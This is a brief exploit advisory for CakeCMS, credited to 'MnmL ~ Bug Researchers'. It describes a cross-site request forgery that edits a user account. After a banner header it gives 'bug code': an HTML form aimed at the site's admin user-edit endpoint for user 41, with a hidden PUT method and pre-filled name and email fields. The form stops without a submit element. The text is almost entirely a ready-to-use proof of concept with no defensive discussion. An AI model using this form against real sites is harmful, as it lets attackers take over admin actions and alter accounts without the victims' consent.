< ------------------- header data start ------------------- > ######################################################### # Application Name : CakeCMS # Vulnerable Type : Edıt USER (XSRF) Vuln # author : MnmL ~ Bug Researchers ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form action="SITE.COM/admin/users/edit/41" method="post" id="UserEditForm"><fieldset style="display: none;"><input type="hidden" value="PUT" name="_method"/></fieldset> <input type="hidden" id="UserId" value="41" name="data[User][id]"/> User Name : <input type="text" name="data[User][name]" size="86" maxlength="50" value="dsada" id="UserName"/> E-Mail : <input type="text" name="data[User][email]" size="86" maxlength="100" value="dsada@xxxxxxxxx" id="UserEmail"/>
